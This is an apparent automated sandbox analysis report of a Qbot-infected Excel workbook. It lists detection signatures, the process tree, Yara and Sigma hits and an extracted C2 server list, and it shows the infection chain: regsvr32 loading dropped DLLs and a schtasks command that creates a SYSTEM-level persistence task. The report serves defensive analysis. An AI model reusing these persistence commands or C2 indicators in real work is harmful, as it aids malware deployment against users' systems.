Loading ...

Play interactive tourEdit tour

Windows Analysis Report plan-1053707320.xlsb

Overview

General Information

Sample Name:plan-1053707320.xlsb
Analysis ID:440113
MD5:4854b4dcfa441032f2f54bf2834e894f
SHA1:fa24422834d0f6ce6d3e35a8b0f15a906cdf9823
SHA256:68741c1f5df351dc186805c2c30a79653fd52ce21e2fb2aa34ff0687120343cf
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Qbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Schedule system process
Yara detected Qbot
Allocates memory in foreign processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office process drops PE file
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to evade analysis by execution special instruction which cause usermode exception
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6964 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 3492 cmdline: regsvr32 ..\gihi1.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • explorer.exe (PID: 5800 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
        • schtasks.exe (PID: 6572 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wtdsqwcv /tr 'regsvr32.exe -s \'C:\Users\user\gihi1.dll\'' /SC ONCE /Z /ST 20:54 /ET 21:06 MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • regsvr32.exe (PID: 4864 cmdline: regsvr32 ..\gihi2.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • explorer.exe (PID: 7024 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • regsvr32.exe (PID: 6868 cmdline: regsvr32.exe -s 'C:\Users\user\gihi1.dll' MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 7092 cmdline: -s 'C:\Users\user\gihi1.dll' MD5: 426E7499F6A7346F0410DEAD0805586B)
      • WerFault.exe (PID: 5044 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7092 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • regsvr32.exe (PID: 5824 cmdline: regsvr32.exe -s 'C:\Users\user\gihi1.dll' MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 6700 cmdline: -s 'C:\Users\user\gihi1.dll' MD5: 426E7499F6A7346F0410DEAD0805586B)
      • WerFault.exe (PID: 6372 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Qbot

{"C2 list": ["204.97.97.215:21858", "70.154.48.62:44327", "70.31.11.245:7267", "213.191.161.231:29643", "153.239.78.184:38503", "78.214.129.166:38539", "254.124.232.207:39310", "109.164.21.24:64901", "141.215.250.177:22875", "227.244.119.210:52552", "174.179.129.208:15267", "111.112.232.190:48521", "255.28.73.185:49979", "141.103.36.51:3939", "116.110.10.187:25167", "85.180.25.176:32726", "79.254.143.27:14876", "235.218.248.190:29975", "161.4.87.73:5800", "224.200.240.56:14635", "9.155.72.32:55392", "216.67.224.194:53640", "141.121.237.255:1461", "121.42.239.196:13549", "179.179.31.112:63026", "218.134.37.166:33358", "239.135.100.181:9787", "239.242.36.114:27696", "60.26.149.129:8707", "114.86.119.195:36123", "154.85.103.18:33933", "141.204.72.150:28929", "229.176.154.40:1991", "206.193.4.142:60112", "113.150.134.145:14637", "182.192.0.153:3039", "37.235.119.158:25257", "118.217.148.55:40918", "157.238.131.159:17525", "120.231.33.231:39242", "113.196.247.102:57216", "39.96.161.153:21974", "37.95.209.127:37781", "88.221.119.43:55621", "49.191.149.88:15536", "25.203.154.171:56937", "160.244.29.108:63666", "227.245.195.188:38491", "11.191.229.149:48178", "29.223.190.224:4552", "144.140.245.179:62583", "199.3.125.195:31574", "37.158.174.86:39635", "19.119.17.26:61415", "18.218.204.94:25156", "17.147.2.193:34433", "232.165.224.232:64576", "255.113.254.238:35466", "244.159.158.34:29113", "6.247.120.152:5539", "20.23.44.234:12808", "68.58.107.122:40009", "177.71.146.158:14858", "218.154.172.108:36509", "59.198.167.253:53302", "45.116.255.72:7036", "11.48.233.235:37824", "181.50.13.209:4123", "8.141.223.46:63405", "196.248.106.49:5168", "123.119.149.61:15034", "158.237.184.100:6941", "47.102.246.133:28795", "245.30.65.166:57241", "96.17.6.131:61427", "158.127.33.70:13273", "171.113.240.107:55225", "29.188.217.91:11621", "233.26.116.125:35782", "103.200.182.78:41414", "212.166.144.41:13766", "225.167.47.169:10108", "218.233.238.210:11757", "61.149.157.113:33452", "224.147.98.25:43134", "215.16.240.69:58681", "69.158.146.64:33703", "43.93.98.34:24929", "94.211.166.245:8677", "237.58.8.158:44902", "22.105.125.67:37017", "228.204.65.194:22014", "240.58.16.219:55052", "160.25.48.169:7011", "48.255.58.190:27057", "12.207.95.189:15569", "100.104.109.104:51319", "154.195.229.221:35588", "98.133.117.21:26241", "124.177.25.94:55126", "59.211.38.81:7832", "197.103.23.2:43598", "123.210.126.131:49328", "192.204.246.62:53778", "220.178.117.122:65405", "32.177.158.150:9600", "186.12.160.146:13500", "217.11.103.56:65312", "183.137.66.59:24965", "73.73.123.212:54786", "84.4.148.67:50685", "173.176.181.154:13839", "216.1.166.66:2080", "144.122.242.245:52290", "115.127.247.89:14716", "25.5.112.94:8779", "40.151.136.48:36008", "78.114.25.179:8887", "185.149.69.37:4676", "66.204.28.22:17430", "50.138.243.152:7941", "195.170.56.121:46373", "189.236.221.185:38192", "39.35.83.72:15610", "213.64.255.229:34462", "27.98.20.110:25605", "250.34.90.10:20014", "55.164.192.159:18516", "89.170.84.87:31034", "195.228.141.229:32482", "67.144.76.43:2062", "217.168.11.163:26766", "212.238.116.17:9843", "109.26.22.183:43143", "58.142.103.104:44200", "200.39.220.35:59648", "115.127.244.231:37553", "150.184.143.159:42919", "14.29.250.1:10356", "86.168.140.17:49045", "62.128.177.85:27511", "219.13.32.40:17684", "60.225.8.42:6650", "113.94.94.176:17136", "243.196.184.116:25994", "168.243.164.189:60510", "217.56.43.145:25488"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.973589332.0000000001100000.00000040.00000001.sdmpQakBotQakBot Payloadkevoreilly
  • 0x13223:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
00000006.00000002.711643542.0000000000F30000.00000004.00000001.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
    00000006.00000002.711643542.0000000000F30000.00000004.00000001.sdmpQakBotQakBot Payloadkevoreilly
    • 0x12623:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
    00000003.00000002.700614054.0000000001120000.00000004.00000001.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
      00000003.00000002.700614054.0000000001120000.00000004.00000001.sdmpQakBotQakBot Payloadkevoreilly
      • 0x12623:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
      Click to see the 1 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      13.2.explorer.exe.660000.0.raw.unpackQakBotQakBot Payloadkevoreilly
      • 0x13223:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
      3.2.regsvr32.exe.10000000.3.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
        3.2.regsvr32.exe.10000000.3.unpackQakBotQakBot Payloadkevoreilly
        • 0x12623:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
        6.2.regsvr32.exe.10000000.3.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
          6.2.regsvr32.exe.10000000.3.unpackQakBotQakBot Payloadkevoreilly
          • 0x12623:$crypto: 8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 ...
          Click to see the 13 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
          Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 ..\gihi1.dll, CommandLine: regsvr32 ..\gihi1.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6964, ProcessCommandLine: regsvr32 ..\gihi1.dll, ProcessId: 3492

          Persistence and Installation Behavior:

          barindex
          Sigma detected: Schedule system processShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wtdsqwcv /tr 'regsvr32.exe -s \'C:\Users\user\gihi1.dll\'' /SC ONCE /Z /ST 20:54 /ET 21:06, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wtdsqwcv /tr 'regsvr32.exe -s \'C:\Users\user\gihi1.dll\'' /SC ONCE /Z /ST 20:54 /ET 21:06, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 5800, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wtdsqwcv /tr 'regsvr32.exe -s \'C:\Users\user\gihi1.dll\'' /SC ONCE /Z /ST 20:54 /ET 21:06, ProcessId: 6572

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 6.2.regsvr32.exe.10000000.3.unpackMalware Configuration Extractor: Qbot {"C2 list": ["204.97.97.215:21858", "70.154.48.62:44327", "70.31.11.245:7267", "213.191.161.231:29643", "153.239.78.184:38503", "78.214.129.166:38539", "254.124.232.207:39310", "109.164.21.24:64901", "141.215.250.177:22875", "227.244.119.210:52552", "174.179.129.208:15267", "111.112.232.190:48521", "255.28.73.185:49979", "141.103.36.51:3939", "116.110.10.187:25167", "85.180.25.176:32726", "79.254.143.27:14876", "235.218.248.190:29975", "161.4.87.73:5800", "224.200.240.56:14635", "9.155.72.32:55392", "216.67.224.194:53640", "141.121.237.255:1461", "121.42.239.196:13549", "179.179.31.112:63026", "218.134.37.166:33358", "239.135.100.181:9787", "239.242.36.114:27696", "60.26.149.129:8707", "114.86.119.195:36123", "154.85.103.18:33933", "141.204.72.150:28929", "229.176.154.40:1991", "206.193.4.142:60112", "113.150.134.145:14637", "182.192.0.153:3039", "37.235.119.158:25257", "118.217.148.55:40918", "157.238.131.159:17525", "120.231.33.231:39242", "113.196.247.102:57216", "39.96.161.153:21974", "37.95.209.127:37781", "88.221.119.43:55621", "49.191.149.88:15536", "25.203.154.171:56937", "160.244.29.108:63666", "227.245.195.188:38491", "11.191.229.149:48178", "29.223.190.224:4552", "144.140.245.179:62583", "199.3.125.195:31574", "37.158.174.86:39635", "19.119.17.26:61415", "18.218.204.94:25156", "17.147.2.193:34433", "232.165.224.232:64576", "255.113.254.238:35466", "244.159.158.34:29113", "6.247.120.152:5539", "20.23.44.234:12808", "68.58.107.122:40009", "177.71.146.158:14858", "218.154.172.108:36509", "59.198.167.253:53302", "45.116.255.72:7036", "11.48.233.235:37824", "181.50.13.209:4123", "8.141.223.46:63405", "196.248.106.49:5168", "123.119.149.61:15034", "158.237.184.100:6941", "47.102.246.133:28795", "245.30.65.166:57241", "96.17.6.131:61427", "158.127.33.70:13273", "171.113.240.107:55225", "29.188.217.91:11621", "233.26.116.125:35782", "103.200.182.78:41414", "212.166.144.41:13766", "225.167.47.169:10108", "218.233.238.210:11757", "61.149.157.113:33452", "224.147.98.25:43134", "215.16.240.69:58681", "69.158.146.64:33703", "43.93.98.34:24929", "94.211.166.245:8677", "237.58.8.158:44902", "22.105.125.67:37017", "228.204.65.194:22014", "240.58.16.219:55052", "160.25.48.169:7011", "48.255.58.190:27057", "12.207.95.189:15569", "100.104.109.104:51319", "154.195.229.221:35588", "98.133.117.21:26241", "124.177.25.94:55126", "59.211.38.81:7832", "197.103.23.2:43598", "123.210.126.131:49328", "192.204.246.62:53778", "220.178.117.122:65405", "32.177.158.150:9600", "186.12.160.146:13500", "217.11.103.56:65312", "183.137.66.59:24965", "73.73.123.212:54786", "84.4.148.67:50685", "173.176.181.154:13839", "216.1.166.66:2080", "144.122.242.245:52290", "115.127.247.89:14716", "25.5.112.94:8779", "40.151.136.48:36008", "78.114.25.179:8887", "185.149.69.37:4676", "66.204.28.22:17430", "50.138.243.152:7941", "195.170.56.121:46373", "189.236.221.185:38192", "39.35.83.72:15610", "213.64.255.229:34462", "27.98.20.110:25605", "250.34.90.10:20014", "55.164.192.159:18
          Multi AV Scanner detection for submitted fileShow sources
          Source: plan-1053707320.xlsbVirustotal: Detection: 25%Perma Link
          Source: plan-1053707320.xlsbReversingLabs: Detection: 28%
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ka[1].htmJoe Sandbox ML: detected
          Source: C:\Users\user\gihi1.dllJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ka[1].htmJoe Sandbox ML: detected
          Source: C:\Users\user\gihi2.dllJoe Sandbox ML: detected
          Source: 6.2.regsvr32.exe.10000000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen3
          Source: 4.2.explorer.exe.1100000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen3
          Source: 3.2.regsvr32.exe.10000000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen3
          Source: 13.2.explorer.exe.660000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen3
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
          Source: unknownHTTPS traffic detected: 50.116.92.246:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 50.116.92.246:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000F.00000003.716292885.0000000003244000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.942057600.0000000003421000.00000004.00000001.sdmp
          Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: advapi32.pdbs source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000F.00000003.720799900.0000000004000000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946842030.00000000036A0000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000F.00000003.716161142.000000000323E000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: shcore.pdb source: WerFault.exe, 0000000F.00000003.720799900.0000000004000000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946842030.00000000036A0000.00000004.00000040.sdmp
          Source: Binary string: sechost.pdbH source: WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: regsvr32.pdbk source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: shell32.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: cryptbase.pdbM source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp
          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: gCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000F.00000002.727844501.0000000002E72000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.953457269.0000000000472000.00000004.00000001.sdmp
          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000F.00000003.716177962.000000000324A000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: mpr.pdb source: WerFault.exe, 0000000F.00000003.720799900.0000000004000000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946842030.00000000036A0000.00000004.00000040.sdmp
          Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: regsvr32.pdb source: WerFault.exe, 0000000F.00000003.716155261.0000000003238000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: shcore.pdbk source: WerFault.exe, 0000000F.00000003.720799900.0000000004000000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946842030.00000000036A0000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000F.00000003.716161142.000000000323E000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.942178479.0000000000840000.00000004.00000001.sdmp
          Source: Binary string: regsvr32.pdb( source: WerFault.exe, 0000000F.00000003.716155261.0000000003238000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.942167491.000000000083A000.00000004.00000001.sdmp
          Source: Binary string: profapi.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: propsys.pdbT source: WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: winspool.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: propsys.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000F.00000003.720799900.0000000004000000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946842030.00000000036A0000.00000004.00000040.sdmp
          Source: Binary string: powrprof.pdby source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp
          Source: Binary string: sfc.pdbK source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: ole32.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000F.00000003.720799900.0000000004000000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946842030.00000000036A0000.00000004.00000040.sdmp
          Source: Binary string: wsspicli.pdbv source: WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: advapi32.pdbN source: WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000F.00000003.720799900.0000000004000000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946842030.00000000036A0000.00000004.00000040.sdmp
          Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000F.00000003.716177962.000000000324A000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.942198358.000000000084C000.00000004.00000001.sdmp
          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000F.00000003.720799900.0000000004000000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946842030.00000000036A0000.00000004.00000040.sdmp
          Source: Binary string: setupapi.pdbB source: WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000F.00000003.720799900.0000000004000000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946842030.00000000036A0000.00000004.00000040.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: winspool.pdbk source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp
          Source: Binary string: oleaut32.pdb| source: WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000F.00000003.716292885.0000000003244000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.942187790.0000000000846000.00000004.00000001.sdmp
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: sfc.pdb source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.946851520.00000000036A6000.00000004.00000040.sdmp
          Source: Binary string: sechost.pdbe source: WerFault.exe, 0000000F.00000003.720807356.0000000004006000.00000004.00000040.sdmp
          Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000F.00000003.720783057.0000000003EF1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.946824963.00000000038C1000.00000004.00000001.sdmp
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1000BB22 FindFirstFileW,FindNextFileW,

          Software Vulnerabilities:

          barindex
          Document exploit detected (creates forbidden files)Show sources
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\gihi1.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\gihi2.dllJump to behavior
          Document exploit detected (drops PE files)Show sources
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: ka[1].htm.0.drJump to dropped file
          Document exploit detected (UrlDownloadToFile)Show sources
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
          Document exploit detected (process start blacklist hit)Show sources
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
          Source: global trafficDNS query: name: carpascapital.com
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 50.116.92.246:443
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 50.116.92.246:443
